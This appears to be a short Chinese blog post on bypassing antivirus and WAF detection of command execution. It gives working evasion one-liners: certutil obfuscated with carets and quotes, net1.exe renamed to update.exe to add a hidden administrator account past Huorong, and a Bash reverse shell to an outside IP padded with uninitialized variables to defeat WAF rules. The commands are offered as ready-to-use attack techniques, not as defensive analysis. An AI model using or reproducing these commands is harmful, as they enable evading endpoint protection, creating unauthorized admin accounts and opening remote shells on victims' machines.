命令执行绕过
命令执行绕过
前言:仅提供一些绕过思路,对于较为敏感的命令基本已经失效了
1、多空一格
2、^混淆
certutil -url^cache
3、拷贝文件名
copy C:\Windows\System32\certutil.exe xx.exe
之前绕过火绒添加用户案例
copy c:\windows\system32\net1.exe d:\update.exe
d:\update.exe user newuser password123 /add
net localgroup administrators newuser /add
4、修改文件资源绕过360
5、""混淆
ce""""rtu""til -url""""ca""che -spl""""it -f
6、未初始化变量绕过
在Linux中,可以利用Bash的未初始化变量来逃避Waf的检测。未初始化的变量会被视为一个空字符串。如果你尝试引用一个未初始化的变量 $u,它不会报错,而是会返回一个空值。
/bin$u/bash$u -i$u >&$u /dev$u/tcp$u/xx.xx.xx.xx$u/5003$u 0>&1$u
本文作者:xiaoxin07
本文链接:https://www.cnblogs.com/xiaoxin07/p/18401610
版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· 阿里巴巴 QwQ-32B真的超越了 DeepSeek R-1吗?
· 【译】Visual Studio 中新的强大生产力特性
· 【设计模式】告别冗长if-else语句:使用策略模式优化代码结构
· 10年+ .NET Coder 心语 ── 封装的思维:从隐藏、稳定开始理解其本质意义